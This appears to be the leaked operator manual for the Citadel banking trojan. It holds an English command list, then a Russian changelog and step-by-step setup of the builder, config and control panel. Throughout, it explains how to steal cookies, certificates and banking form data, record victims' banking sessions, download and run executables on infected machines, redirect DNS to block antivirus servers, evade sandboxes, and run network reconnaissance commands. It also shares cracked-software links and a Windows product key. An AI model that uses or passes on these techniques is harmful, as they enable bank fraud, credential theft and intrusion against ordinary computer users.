bot_httpinject_enable [url_mask] - Enable the implementation of a bot inzhekta

Working with the user.

user_destroy - Kill Axis bot

user_logoff - Terminate a user session bot

user_execute [url] - Run the executable file on a computer bot

user_cookies_get - Get a cookie from your computer bot

user_cookies_remove - Remove the cookies from your computer bot

user_certs_get - Get a certificate from a computer bot

user_certs_remove - Delete certificate from a computer bot

user_homepage_set [url] - Specify URL as a homepage bot

user_flashplayer_get - Get the SOL files from a computer bot

user_flashplayer_remove - SOL delete files from a computer bot

dns_filter_add <host> <ip> - adding a mask to redirect

dns_filter_add * microsoft.com 127.0.0.1 - adding a mask to redirect

dns_filter_remove * microsoft.com - remove the mask to redirect

dns_filter_remove <host>

when you remove must be specified the same host as the addition of

 url_open http://www.host.com

 Open the computer Holder arbitrary given page deflotovym browser to full screen, ideal for advertising something

 user_execute http://www.citadel-host.com/citadel_folder/file.php|file=exe.exe

 The team is working without the quotes, starting with version 1.2.4.0, need to fill in for the right exe file in the directory of files on your stronghold and point it at the end of the line.

- We have added a new option in the section entry "StaticConfig"

  disable_cookies 0

  

  1 disables sending cookies to the server at all.

  0 includes sending cookies to the server.

- Now on the Section's WebFilters

Two new parameters: P and G.

Parameter P is given to the link points to a record only POST requests (all others are ignored), with this link.

The parameter G indicates the recording just GET requests (all others are ignored) with the given link.

The parameter! ignores the requests specified by the mask and do not miss them in the logs.

Examples:

"Phttp :/ / *. Com /" - only to rob the post all requests in the http://. https:// ignores

"Ghttp :/ / *. Eu / * banking *" - robs just all GET requests for a given mask.

"Phttps :/ / *. Com /" - only to rob https://-post requests

"! Http:// *. Com / *. Jpg" - ignore jpg images.

- Getting information about installed software (the list - the company | product | version) on your computer: info_get_software

- Getting information about the installed antivirus on your computer: info_get_antivirus

- Getting information about the installed firewall on your computer: info_get_firewall

-------------------------------------------------------------------------------------------

Personal Manual - Original (Pastebin)

------------------------------------------------------------------------------------------- 

Version 1.3.4.5

Manual Version: 2.0 (Последнее обновление 06.06.2012)

Список нововведений для бота:

[+] Фикс VNC бага на Vista/Windows 7. Теперь можно полноценно работать с Internet Explorer 8 (напомню, была проблема с рендерингом IE)

[+] Поддержка Mozilla Firefox 7.0 (решена проблема, при которой не слались отчеты в последних версиях браузера)

[+] Крипто-защита (расшифровывающая тело в памяти).

[+] Редиректы DNS (не через hosts). Можно блокировать/редиректить любые URL'ы, не опасаясь, что их заметит эвристика. Например заблокировать AV-cервера или редиректить банк-пагу на другой хост.

!BONUS! Список URL'ов популярных антивирусных программ для блокирования идет в комплекте.

[+] Информация о версии сотфа в репорте. Высылает вам подробную версию браузера холдера вместе с отчетом. Помогает, при имитации настроек холдера.

[+] Дополнительный уровень защиты сервера от трекеров - Login Key.

[+] Механизм аутинтефикации при загрузке конфигов (нет прямых урлов). Дает полноценную защиту от устоявшихся трекеров.

[+] Поддержка граббера Google Chrome. [Проверено на последней версии 15.x/16.x/17.x].

[+] Поддержка инжектов Google Chrome. [Проверено на последней версии 15.x/16.x/17.x].

[+} Добавлено кеширование поиска функций, что ускоряет установку хуков Chrome.

[+] Добавлена возможность выполнения системных CMD команд при старте бота (секция CMDList) с отправкой репорта на сервер. К примеру, нужно вам чтобы при инсталле, отправлялся результат команды "ipconfig /all", или список всех доступных шар. Полезно, при анализе внутренней структуры компаний. (например, часто попадаются боты в локалке с именами ACCOUNTANT_PC, POS_SERV, DATABASE...)

[+] Добавлен механизм проверки сохранности хуков на некоторых Windows.

[+] Эвристический анализатор окружения со стоп листом для нежелательного ПО (значительно повышает скрытность),включены все популярные антивирусы.

[+] Исправлены мелкие баги.

[+] Видео граббер. Уникальная возможность следить за работой ваших инжектов "глазами холдерами", в конфиге указываются список сайтов и длина записи видео в секундах, при заходе на заданный линк, активируется видео-запись в формате .mkv. Рекомендуется настроить свой сервер для приема файлов 10-60МБ.

[+] Убрано удаление кукисов при инсталле, т.к это сбивает "fingerprint" холдера при работе с заливами.

[+] добавлена поддержка HTTP 1.0 и расширенных хидеров (например респонз не всегда выглядит как "HTTP/1.1 200 OK", бывает "HTTP/1.1 200 follow document", в данном случае после кода 200 идет несколько слов) применимо к браузерам Firexfox & Chrome

[+] Добавлен гейт генератор (на случай, если вы хотите разместить файлы на промежуточном хосте для редиректа).

[+] Полностью переделано шифрование (передача данных, запись логов/видео, загрузка конфигов и т.д) у Citadel, на смену устаревшему RC4 используемому в Zeus, пришел AES 128. Напомню, что RC4 дал асечку, когда массово начали выпускаться различные декрипторы конфигов/инжектов для Zeus, а хосты начали палиться в abuse.ch.

Теперь помимо встроенного RC4, который шифруется с вашей персональной сигнатурой, в софт также встроено AES шифрование, на выходе мы получаем защищеное AES128 обращение бот<->гейт. Никакие ZeusDecryptor'ы(ThreatExpert) и автоматизированый реверсинг не будут помехой для вашей комфортной работы на текущий момент (Jan 2012).

[+] Весь базовый функционал, оставшийся от зевса присутствует. Думаю, не стоит его писать здесь снова.

[+] Исправлена ошибка записи репортов у веб-фильтров в конфиге с параметром "!" (игнорирование), который должен был исключать все заданные ссылки, а вместо этого делал обратное и писал их в лог.

[+] Добавлен новый параметр-фильтр в config-файл, а именно функция отсылать или не отсылать cookies на сервер.

Параметр статичного конфига disable_cookies 0/1 указывает отключить ли граббинг куков (1 - отключить, 0 - включить).

Вручную, также, кукисы можно получить командой user_cookies_get из админки, если очень нужны.

[+] Добавлена функция произвольного открытия страницы дефлотовым браузером пользователя на боте.

К примеру, если вам нужно накрутить какой-нибудь счетчик или статистику голосования или вы хотите получать доп.доход с вашего ботнета открывая страницы с шопами (а также: фарма, гемблинг, дроп-проекты и т.д..) отличный способ разрекламировать нужную страницу!

Новый параметр url_open <url>

[+] Новый вид фильтрации WebFilters в конфиг-файле при сборке.

Два новых параметра: P и G.

Параметр P указанным перед ссылкой, указывает о записи только POST запросов(все другие игнорируются) с этой ссылки.

Параметр G указывает о записи только GET запросов (все другие игнорируются) с заданной ссылки.

Параметры не комбинируются, т.е. следует указывать какой-то один из них.

[+] Добавлена модульная система в софт, что дает нам:

* Расширяемость и загрузку любого операционного функционала ботам, ориентированного для Citadel.

Все модули загружаются с сервера и распаковываются динамически в памяти, что исключает их детектирование.

Хранение и передача во внешнем мире исключительно в шифрованном виде.

Модули грузятся в целевые процесссы, поэтому весомо экономят память.

Большая управляемость - модули можно отключать через конфиг.

[+] Видео-граббер переделан на модульную основу. Теперь вес некриптованного билда <190 кб. Всегда.

[+] Добавлен новый параметр timer_modules (тайминги для загрузки модулей).

[+] Добавлена поддержка нового браузера Google Chrome 17, а также исправлен баг с обработкой Flash'a в нем.

[+] Добавлена поддержка макросов. Введены макросы: %BOTID%, %BOTNET%

* Можете вставлять в любой участок инжектов данные макросы и передавать данные на ваш сервер (АЗ/инжекты), передается имя бота и имя ботнета.

[+] Добавлены 4 команды управления модулями (включение/выключение, запрет/разрешение на скачивание).

[+] Добавлен новый параметр disable_httpgrabber 1/0 для Chrome: исключает обработку обычных HTTP (не HTTPS) запросов.

[+] Добавлена запись полного User-Agent в отчеты HTTP(S) граббера, позволяет клонировать холдерский UserAgent через любые утилиты типа CCTools.

[+] Добавлена запись разрешения экрана в отчеты HTTP(S) граббера, пример "Screen(w:h): 1600:900" - полезно при клонировании параметров холдера, многие банки на это обращают внимание.

[+] Изменен протокол отправки видео-файлов для снижения нагрузки на сервер (у некоторых были проблемы с нагрузкой на сервер и он сильно тормозил)

[+] Добавлена возможность отсылки jabber-уведомлений нескольким получателям в админке Citadel.

[+] Добавлена возможность указания нескольких url_config'ов (пути до основного конфига), раньше было так: если у вас недоступен основной конфиг в момент инсталла бота, то резервный никак не скачивался, теперь этой проблемы не будет и бот пытается стянуть конфиг с другого URL'a(можно вписать до 20 резервных).

[+] Исправлена ошибка в Google Chrome (17x) приводящая к зависанию подпроцесса, при открытии нескольких вкладок с инжектами.

[+] Добавлены новые команды:

- Получение информации об установленном ПО (список - компания|продукт|версия) на компьютере: info_get_firewall

- Получение информации об установленном антивирусе на компьютере: info_get_antivirus

- Получение информации об установленном фаерволе на компьютере: info_get_firewall

Информация идет в виде отдельного репорта для каждого бота. Скоро встроим массовую статистику по установленному софту в админку Citadel.

[+] Изменен алгоритм антиэмуляции для ряда АВ (не считается криптором, софт стал невидимым для нескольких проактивок).

[+] Исправлена проблема запуска под пользователем SYSTEM.

[+] Добавлена возможность особых Jabber-уведомлений, при обнаружении заданных ботов по маске (к примеру маска *corporate*, будет искать botid с таким совпадением), даже если они не прислали никаких логов, скрипт уведомит вас в Jabber-сообщении о появлении бота. Теперь вы не пропустите мимо глаз ценных ботов.

[+] В админке появилась новая секция "Эффективность и Безопасность", мы провели интеграцию с сервисом scan4you, и теперь вы можете одним кликом проверить все ваши ехе-билды на палевность сразу в админке Citadel, также, вы можете установить автоматическую проверку файлов раз в сутки, и если один из ваших файлов палится более чем 3я антивирусами, вы немедленно получите уведомление в ваш Jabber, чтобы вы могли

сразу заменить ехе. Теперь механизм будет работать за вас автоматически, ленитесь на здоровье!

[+] Некоторые клиенты жаловались на то, что лишь 40% ботов обновляется на новую версию ехе, остальные не могут обновиться по какой-то неизвестной причине. Действительно, баг остался еще со времен зевса, мы его исследовали и исправили. Теперь введен новый параметр в конфиге: timer_autoupdate 8

В котором задается время (в часах), как часто скачивать и перезапускать exe с сервера (RC4 ключ должен совпадать). 80% ботов теперь обновляются успешно, криптуйте и перезаливайте ехе, живучесть повысилась на 37.1%, ваши боты будут иметь самый свежий и чистый билд.

[+] Переработана система отправки отчетов на сервер, в предыдущих версиях для каждого отчета происходила единичная отправка POST запроса на гейт, в новой схеме отчеты отправляются пачкой по несколько штук, это позволяет свести до минимума количество сессий на сервере и нагрузка на сервере становится минимальной, что позволяет выдерживать большое количество ботов онлайн.

[+] Формат видео от ботов изменен на .webm(HTML5), мы встроили онлайн видео плеер в админку Citadel, теперь вы можете смотреть видео прямо в вашем брауезере(рекомендуется Opera). Из возможностей: перемотка назад-вперед/фулл-скрин/поиск видео по BotID,IP-адресу,дате.

Но этого мало и мы пошли дальше, многие из вас используют(пора уже всем использовать и разрабатывать индустрию совместно) АЗ и персональные админки для инжектов/сбора акков и т.п. Вы бы хотели из вашей админки смотреть видео по заливу или как работает ваш инжект на боте? Легко! Мы создали API-систему, теперь вы можете передать BotID или IP-адрес скрипту, а API вернет вам готовый HTML-embed код всех видео по данному боту и вы можете вставить и смотреть видео хоть на narod.ru, не заходя в админку Citadel.

[+] Добавлен удобный анализатор-парсер системных команд (CMDList) в админку, теперь вы можете посмотреть в новом формате в виде таблицы, результаты выполнения системных команд, таких как: ipconfig, список ПК в локальной сети, список процессов и т.п.

[+] Теперь при установке билда на бота, автоматически единоразово присылается в админку cледущая информация: установленные фаерволлы, установленные антивирусы, установленные программы.

Вы можете посмотреть информацию как для отдельного бота, так и для всего ботнета. Мы создали отдельный раздел, в котором вы можете посмотреть всю статистику в виде наглядного графика и подсчетов. Теперь вы знаете с кем бороться.

[+] Добавлена возможность "Избранных логов", вы можете пометить любой интересный аккаунт(отчет) при поиске данных в админке, а потом без труда найти его т.к он будет выделен отдельным цветом.

[+] Реализована совместимость инжектов с UTF-8 (теперь в инжекты можно вставлять любые языки, такие как японский, китайский и т.д)

[+] Разработана крипт-панель в админке Citadel. Это раздел в админке, который позволяет вам обновлять ехе-файл ботам, прямо из веба. В любой момент, вы можете перезакачать нужный ехе-файл и боты его своевременно скачают. Ведется история загрузок в формате: Файл | Дата Загрузки | Оплачено(Y/N)

По поводу последнего пункта, мы разделили полномочия и создали отдельную категорию пользователей с правами "криптера" - эти пользователи имеют доступ к вашей панели по вашему желанию и единственная привилегия этих пользователей - возможность обновлять ехе-файл, при этом вы можете отмечать в таблице, оплачен конкретный крипт или нет.

Можно включить jabber-уведомления по результату проверки на scan4you.

[+] Добавленны полноэкранные скриншоты (Опция в конфиге - "@@").

[+] Улучшен механизм автоапдейтинга: если вы столкнулись с проблемой большой нагрузки на сервере при обновлении(либо боты не переходят на новую админку), то этот фикс исправляет эту ситуацию. Фикс включает в себя:

- Старые репорты от прошлой версии ехе удаляются при обновлении (tmp файл), дополнительная подстраховка.

- Тяжелые отчеты (видео и прочее файловые репорты) дополнительно проверяются на корректность и удаляются в случае проблем(например, если такой файл уже закачан)

- Изменено время инициализации апдейтинга, в результате чего исклчючен deadloc и не возможность дальнейшего апдейта при какой-либо ошибке файловой системы.

[+] Исправили проблему мусорных логов в админке: убрали полное логирование Flash-роликов (swf/flv) из логов и всего Facebook, потому что огромное количество мусора идет именно от них.

[+] Модуль "Качественная проверка WebSocks" теперь встроен в админку, никаких лишних скриптов. Показывает: страну, штат, город, хостнейм, аптайм и ping lag.

Возможность входа в этот раздел без пароля, для удобства когда нужен срочно сокс smile.gif

[+] Модуль "Парсер логов" теперь встроен в админку, никаких лишних скриптов. Интерфейс значительно улучшен, добавлена возможность создания "избранных доменов", "архивных логов" и возможность парсинга https или http доменов на выбор. Выстраивается визуальная таблица всех доменов, которые фигурируют в логах.

[+] Добавлен раздел "Заметки" в админку Citadel, что-то вроде онлайн блокнота. Адаптировали интерфейс админки для планшетов iPad/Galaxy Tab.

[+] Доработали модуль "VNC-админка", теперь он встроен напрямую в админку Citadel, никаких дополнительных скриптов. Все устанавливается 1 кликом. Много новых возможностей, а именно:

- Возможность работы с API, вы передаете BotID или IP-адрес скрипту, к примеру через инжект, а он устанавливает VNC/BackConnect Socks-соединение, присылая данные для подключения вам в Jabber. Можно вызывать скрипт в любой момент времени, применимо к АЗ.

- Напротив каждого отчета в разделе "Поиск в базе данных" появилось 4 кнопки: "Добавить в избранное", "Connect VNC", "Connect BC Socks", "Autoconnect VNC", "Autoconnect BC SOCKS"

- AutoConnect VNC при включенной опции, бот будет устанавливать vnc-соединение при каждом выходе в онлайн, пока вы не отключите это.

- AutoConnect BC Socks при включенной опции, бот будет устанавливать backconnect socks соединение при каждом выходе в онлайн, остальные опции создают разовый коннект.

- Появилась возможность создавать автоматически VNC/BC SOCKS-соединение как только от бота пришел нужный аккаунт по URL-маске, разбираем горячие пирожки.

- Напротив каждого аккаунта по URL-маске пишется дата последнего входа в этот акк (last login), теперь вам не надо чекать аккаунты на активность - за вас это сделают скрипты.

- Возможность любых уведомлений в несколько Jabber'ов сразу.

[+] Исправлена проблема цепочки хуков в Chrome.

[+] При запуске user_execute с флагом "-f" принудительно переводится в режим только апдейтинга ехе и не будет запущен как инсталятор.

[+] Оптимизирована работа гейта, что позволило снизить нагрузку. Упрощена работа инсталлятора админки, что позволяет установить все модули в 1 клик.

[+] Добавлена поддержка новой версии Chrome 18 [инжекты/формграббинг]

[+] Добавлена кнопка "Все отчеты бота" в админке, позволяет просмотреть начало и конец отчетов от конкретного бота.

[+] Исправлен баг с ручной командой dns_filter_add, теперь блокировка URL'ов работает корректно.

[+] Исправлен баг с отображением ехе-файлов на главной странице, удаленные ехе теперь исчезают автоматически.

[+] Исправлен баг с работой планировщика заданий scan4you, ежедневная проверка ехе-файлов работает корректно.

[+] Добавлена единая система CRON-работы, одно cron-задание управляет теперь всеми задачами: jabber-уведомления, проверка файлов, работа модулей и т.п.

[+] Добавлена возможность удаления видео из админки.

[+] Добавлена отсылка примечания к боту в Jabber в VNC-модуле.

[+] Обновлена GeoIP база (конец 2011 года).

[+] Последний домен из AdvancedConfigs срабатывает с задержкой, сделано с целью защиты ваших резервных URL'ов от автоматического граббинга ханипотами.

[+] Исправлена работа скрипта архивирования данных в zip в админке (fsarc.php)

[+] Настройки Jabber-аккаунта и всех параметров теперь вынесены в общие настройки.

[+] Теперь можно указывать пути в конфиге с httpS:// (неподписанные сертификаты проходят)

[+] Исправлен баг с регистрозависимостью в инжектах, теперь <BODY> и <body> одинаковые сущности. Все инжекты регистронезависимые.

[+] Полностью измененый интерфейс веб-админки, user-friendly.

[+] Добавлен онлайн просмотр скриншотов из админки. Скрины выстраиваются в ряд в порядке появления, легко переключаются клавишами вперед-назад, сортируются. Нет смысла больше скачивать картинки и смотреть по одной. Виртуальные клавиатуры/страницы видно последовательно.

[+] Добавлена история отстука, вы можете посмотреть статистику отстука вашего ботнета(активных,всего,процент) за неделю, две недели или месяц.

[+] Добавлена история версий софта, вы можете посмотреть статистику по обновлениям Citadel в вашем ботнете. Будете знать сколько ботов перешло на новую версию, а сколько осталось на старой. Рисуется диаграмма.

[+] Возможность поиска логов, только по ботам, которые находятся в онлайне.

[+] Возможность поиска логов по нескольким кейвордам сразу, а также можн их сохранить как алиас и не вводить при следущем поиске заново, а просто выбрать из списка.

[+] Добавлена кнопка "Cookies" в контекстное меню по ботам, которая позволяет оперативно вывести все Cookies бота, если вы их не отключали. Экономит время.

[+] Интегрирована функция экспорта FTP-аккаунтов в API, полезно, если используете сторонний софт класса FTP-Iframer, позволяет вывести в plain-text/xml/php формате ftp-акки по нужной дате.

[+] Добавлена кнопка "Whois" в просмотре отчета, позволяет одним кликом получить всю информацию по IP-адресу отчета.

[+] Добавлена функция комментария к боту при просмотре отчета, а также времени, когда бот последний раз был онлайн.

[+] Создан новый раздел "Избранные отчеты", который позволяет сохранить быструю ссылку на нужный вам отчет + комментарий к ниму. К примеру, если вы встретили интересный аккаунт, нажимаете "добавить в избранное" и отчет будет виден в отдельном разделе, с автоматическим Whois'ом данных и вашим комментарием. Сохраняйте акки не отходя от кассы.

[+] Добавлен антиэмулятор, который позволяет защитить ваш ботнет от реверсинга и попадания в трекеры. Если при запуске, билд детектит что он был запущен в виртуальной машине или песочнице CWSandbox, VMware, Virtualbox, Sandbox он начинает вести себя по-другому и ваш ботнет останется незамеченным. Подробности не раскрываются, т.к анонс находится в паблике и технология очень хитрая.

Из минусов: не сможете протестировать работу в Vmware, придется делать это на реальном ПК или дедике. Опция вынесена в конфиг. antiemulation_enable 0/1

[+] Добавлено отображение статуса бота "Online/Offline" при просмотре отчета.

[+] Одна из самых главных фич: предпросмотр отчета при поиске логов. Не нужно больше открывать 200 окон в браузере, чтобы просмотреть каждый отчет и каждую ссылку. Теперь можно легко нажав на один отчет сделать предпросмотр, а если отчет будет интересен, то просмотреть полную версию. 

Поддерживается быстрое переключение между отчетами клавишами назад-вперед-ESC.

[+] Обновлён скрипт cronjob очистки старых скриптов(команд). Теперь должен у всех работать без багов.

[+] Добавлена в контекстное меню опция "Скриншоты бота"

[+] Модуль VNC-админки: добавлена сортировка по дате последнего соединения / ОС (К примеру, если нужно только WinXP).

[+] Модуль парсер логов: добавлена сортировка по домену / количеству отчётов в порядке убывания.

[+] Модуль FTP-ифреймер: исправлен баг с "умным" ифреймингом, когда кавычки в iframe-коде экранировались. Текущим владельцам, рекомендуется перезалить скрипт-прокладку.

[+] Поскольку предыдущий алгоритм шифрования был взломан спустя несколько месяцев, из-за этого некоторые клиенты попадали в ZeusTracker. Мы разработали и внедрили новый алгоритм шифрования на основе модифицированного RC4. В шифровании используется особый ключ, известный только клиенту. что требует его наличия для расшифровки. Поскольку у каждого клиента свой индвидуальный ключ, теперь от одного клиента не будут страдать все остальные. Если попал один, другие будут от этого защищены. Сейчас мы полностью изолированы от автоматического анализа билдов. В итоге получаем 2 уровня авторизации-защиты бота от трекеров.

[+] Сделали подрезание опции X-Frame-Options в Header'ах, т.к она может мешать некоторым инжектам в работе.

[+] Проделана огромная работа для корректного формграббинга/инжектинга в Chrome 19 (19.0.1084.52m)

[+] Ускорена работа на больших ботнетах админ.интерфейса + гейта засчет оптимизации функционала GeoIP-базы.

----------------------------------------------------------------------------

ДЛЯ УПРОЩЕНИЯ ПОНИМАНИЯ ИНФОРМАЦИИ, ВЫ МОЖЕТЕ ПРОПУСТИТЬ РАЗДЕЛЫ,

ГДЕ ОПИСАНА УСТАНОВКА И ИСПОЛЬЗОВАНИИ МОДУЛЕЙ, КОТОРЫЕ ВЫ НЕ ПРИОБРЕТАЛИ

ИСПОЛЬЗУЙТЕ CTRL+F ДЛЯ ПОИСКА КЛЮЧЕВЫХ СЛОВ И ОПРЕДЕЛЕНИЙ.

ПРИМЕРНЫЙ АДЕКВАТНЫЙ СРОК ПОНИМАНИЯ ВСЕХ ФУНКЦИЙ СОФТА - 1 НЕДЕЛЯ.

----------------------------------------------------------------------------

1) Доступ в CRM

http://citadelmovement.com/crm/

Сначала citadel;rightway

потом

Login: XXXXXXXXXXXXX

Password: XXXXXXXXXXXXX

Что такое Citadel CRM Store?

Это система взаимодействия между нашими клиентами и разработчиком. 

Наверное, вам знакома ситуация, когда саппорт продукта игнорит ваши запросы в icq/jabber'e - этому способствует высокая нагруженность человека, который отвечает за все это, потому что клиентов много, а он один, да еще и занят делами.

С нами такая проблема не актуальна. Специально для вас была разработана система, благодаря которой, вы можете незамедлительно сообщить о баге в софте, а мы в свою очередь оперативно его пофиксим, если таковой имеется. Все запросы поступают нескольким людям одновременно, с уведомлениями по jabber/sms. Вы довольно быстро получите ответ внутри тикет-системы. 

У вас возникла замечательная идея для доработки софта и вы хотите ею поделиться с разработчиком (пусть это даже самая маленькая идея: к примеру вам не нравится иконка в меню) - мы идем вам навстречу.

Вы можете создать 2 вида заявок(читайте-проектов) внутри CRM:

а) публичная заявка - это заявка с темой + описанием(лучше прикладывать ТЗ), которую будут видеть все клиенты, они могут ее обсудить в комментариях, предложить свою цену за реализацию и голосовать: нужна ли эта заявка или отправляем ее в треш.

Вы можете создавать данные виды заявок, а можете голосовать и делать любые действия относительно других заявок наших клиентов.

б) приватная заявка - если вы хотите предложить нашим разработчикам индвидуальную задачу и хорошую цену за реализацию, то этот вид заявки для вас. Его может видеть только разработчики(т.е мы) и вы. Если все условия устраивают обе стороны, данный модуль получаете только вы.

Все актуальные заявки, вы можете видеть в разделе "На обсуждении"

Право голоса имеет 4 значения:

Нужен, я приобретаю

Полезен, но мне не нужен

Абсолютно не нужен

Не нужен, я не приобретаю

Пожалуйста, если вы увидели новую заявку - проголосуйте за нее, даже если она вам вообще не нужна! У нас очень узкий круг, поэтому именно ВАШЕ мнение является решаюшим для ВСЕХ, не оставайтесь в стороне.

О любых событиях внутри CRM(решения, заявки, комментарии) вы будете уведомлены ботом по jabber-каналу. Это сделано для вашего удобства, чтобы вам не рефрешить каждый раз страницу. Но все равно, полезно заходить раз в 3 дня в СRM'ку =) Чем быстрее идут голоса и мнения - тем оперативнее развивается наш продукт.

Если заявка набирает много отказных голосов, она идет в раздел "Отклоненные заявки" и закрывается.

Если заявка одобряется разработчиками, она идет в раздел "В разработке"

По каждой заявке в этом разделе, мы вносим изменения в формате: дата - что сделано

Чтобы вы видели процесс работы над модулем.

Не забудьте указать желаемую объявленную цену на модуль, за которую вы бы оценили доработку.

Все новости мы публикуем в разделе "Новости", если вам не приходят уведомления в Jabber, пожалуйста, немедленно сообщите об этом в саппорт!

Заходите раз в 3-4 дня в СРМ и проверяйте новости и комментарии к заявкам.

2) Список полезных ссылок, которые помогут вам:

 1) VMWare Workstation 6.5.0 + VMWare Tools + Crack:

 http://www.citadelmovement.com/software/VMware-workstation-6.5.0-118166.exe

 2) Образ англоязычной Windows XP SP3 (Corporate Edition):

 http://www.citadelmovement.com/software/Microsoft_C2AE_Windows_XP_SP3_Corporate.iso

 Key: MXDJT-W3TCG-2KGQH-YPMK3-F6CDG

 3) Комплект разработчика для создания инжектов + примеры (автор неизвестен):

 http://www.citadelmovement.com/software/injects_development.zip

3) Установка Citadel 

Папки:

builder - комплект билдера

backconnect - софт для BackConnect VNC админки, а именно php скрипты для Backconnect Windows сервера.

webserver(Либо server[php] - админка, гейт

********************************************************************************

==========================>>>>> Step-By-Step установка Citadel

********************************************************************************

********************

>>>>>>>>>> Требования к серверу.

********************

PHP >5.3, Mysql 5 (желательно последняя версия)

cron, apache. По желанию nginx и панель управления cPanel или DirectAdmin.

+ Windows VPS если приобретали VNC админку (о модуле чуть ниже)

********************

>>>>>>>>>> Шаг 1

********************

При запуске builder.exe, будет строчка

Ключ авторизации: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Это ваш индвидуальный ключ для защиты от трекеров (мы его называем еще LOGIN KEY)

Его нужно поместить в файл webserver/system/global.php, в котором содержится строчка

define('BO_LOGIN_KEY', 'PUT_KEY_HERE');    

Вставляем этот ключ сюда, т.е получается

define('BO_LOGIN_KEY', 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX');     

ОЧЕНЬ ВНИМАТЕЛЬНО ЭТОТ МОМЕНТ ПРОВЕРЯЕМ!!! В 80% СЛУЧАЕВ КЛИЕНТЫ ПРОСТО ЗАБЫВАЮТ ВПИСАТЬ СЮДА СВОЙ КЛЮЧ ИЗ БИЛДЕРА В GLOBAL.PHP И ПОЭТОМУ БОТ НЕ СТУЧИТ В АДМИНКУ. ПРОВЕРЯЕМ ЭТОТ МОМЕНТ ВНИМАТЕЛЬНО!! ЕСЛИ КЛЮЧ УЖЕ ВПИСАН, ЗНАЧИТ ВСЕ ХОРОШО.

Потом ставим chmod 777 на папку:

system

system/data

Также, необходимо поставить перед установкой chmod 777 на всю папку webserver, после полной установки - вернуть права папки на chmod 755

После этих проделанных действий, открываем файлик webserver/api.php

и меняем строчку define('API_TOKEN_KEY', 'changethispassword');

на любой произвольный пароль, к примеру define('API_TOKEN_KEY', 'dgwd23gwegw');

Это нужно чтоб вы были защищены от взлома и вас не скомпрометировали через скрипт API, поменяйте дефлотовый пароль.

********************

>>>>>>>>>> Шаг 2

********************

Идем на http://www.htaccesstools.com/htpasswd-generator/

Вводим любое имя-пароль, выдается строчка типа a:$apr1$HE/llFvK$u3YAEGm277SkotywpTl9w/

Сохраняем эту строчку в файл .htpasswd в директории webserver

После чего создаем новый файл .htaccess    в директории webserver

Туда пишем:

<Files cp.php>

AuthName "Your ID"

AuthType Basic

AuthUserFile /put/do/faila/.htpasswd

require valid-user

</Files>

Где /put/do/faila/.htpasswd - заменяем на свой конечный unix-путь.

Теперь при заходе на админку cp.php, будет дополнительная защита по паре логин-пароль.

Можно сделать по-другому и не создавать .htpasswd, а просто создать файл .htaccess и вписать туда строчки:

<Files cp.php>

Order Deny,Allow

Deny from all

Allow from 111.111.106.111

</Files>

Где 111.111.106.111 - ваш постоянный IP, теперь админка будет доступна только с вашего IP.

Какой из способов вам удобнее - выбирать вам.

********************

>>>>>>>>>> Шаг 3

********************

Откроем файл config.txt и рассмотрим НОВЫЕ настройки, старые настройки унаследованные от зевса остались неизменными, поэтому не будем заострять на них внимание.

  entry "Video"

    quality 1

    length 60

  end

Секция для настроек видеограббера: length длина каждого видео в секундах, рекомендуется указывать не более 10 минут (600 секунд) т.к образуются весьма увесистые файлы.

Quality - от 1 до 5, качество видео. Рекомендуется оставить 1 по умолчанию, чтобы сэкономить на размере видео файлов.

Видео запись срабатывает при заходе на нужный нам линк и снимается ровно length-секунд.

Чтобы задать нужные нам маски для съемки, переходим в раздел  entry "WebFilters"

  "#*paypal.com/*"

  

  символ # перед маской является активацией съемки.

  

Секция очень тонкая, потому что довольно сильно нагружает сервер, указывайте как можно точную маску и только на очень нужные вам ссылки(к примеру банк.акки)

Рекомендуется настроить сервер apache & php - для приема файлов более 50 MB через POST.

Руководство по настройке сервера лежит здесь# http://jdownloads.ru/faq/8-how-uploadbigfiles.html

Тестируйте внимательно съемку видео НЕ на виртуальних машинах, т.к в связи с отсутствием нужных кодеков, может быть такое, что на виртуалках не будет сниматься видео.

Видео складываются в формате .webm, в папку _reports/*BOTNAME*/videos/

Их можно найти через поиск файлов в админке, либо просмотреть через онлайн плеер (раздел "Просмотр Видео"). Рекомендуется просматривать в браузере Opera и Firefox, остальные браузеры не тестировались.

 entry "CmdList"

    "hostname"

    "net view"

    "ipconfig /all"

  end

  

Список системных команд, который бот исполнит при первом запуске 1 раз на системе и пошлет в админку.

В админке, можно найти результат команд как тип отчета "Результат CMD-команды" 

С ним будет список: бот - результат выполнения команды

в удобном формате (Раздел CMD-Парсер)

  encryption_key "key"

  Обязательно здесь задаем свой произвольный ключ, это RC4 ключ он же Encryption Key - вы его задаете при установке админки в инсталлере, поменять его можно в разделе Параметры. Он должен быть не слишком сложный и не слишком простой, совпадать в конфиге и в админке. НЕ РЕКОМЕНДУЕТСЯ СТАВИТЬ БОЛЕЕ 10 СИМВОЛОВ! ЖЕЛАТЕЛЬНО ИСПОЛЬЗОВАТЬ НИЖНИЙ РЕГИСТР И БЕЗ СПЕЦСИМВОЛОВ!

  

 entry "DnsFilters"

    "microsoft.com=127.0.0.1"

    "myspace.com=127.0.0.1"

    "gruposantander.es=127.0.0.1"

  end

Возможность создать DNS-редирект или заблокировать AV-сервер или нежелательный урл(например, если вы обнаружили, что в логах загрузки идут еще кому-то и нужно заблокировать чей-то гейт).

Указывается IP-адрес для редиректа.

ДНС Редирект работает не только для браузеров, а для всего софта, который будет стучаться на данный домен. Все эти запросы будут перенаправлены на ваш IP.

Теперь важно!!! Полученный БИЛД конфига, ехе файл и файл видео.модуля (чтобы создать его, нужно нажать кнопку Собрать модули), мы кладем в папку webserver/files/

В итоге у нас получается 3 файла в папке files. Конфиг, видео.модуль, ехе-файл. Не забудьте закриптовать ехе-файл перед тем как поместить его в папку, иначе будет такое, что по таймеру автообновления, боты начнут скачивать ехе, который палится.

 url_config1 "http://localhost/file.php|file=test_config.bin"  

  Указываем здесь test_config.bin - название нашего конфига, который мы залили в files/ с учетом того, где лежит файл file.php (а лежит он выше папки files). Символ | вас не должен смущать, он тут специально.

  

 url_config1 указывать обязательно, можно также вписать несколько резервных конфиг-урлов, на случай если первый домен пока вы спите ушел в даун, т.к боты не дойдут до вашего конфига, если не смогут скачать основной конфиг.

 В этом случае пишем еще одну строчку под url_config1:

 url_config2 "http://localhost/file.php|file=test_config.bin" 

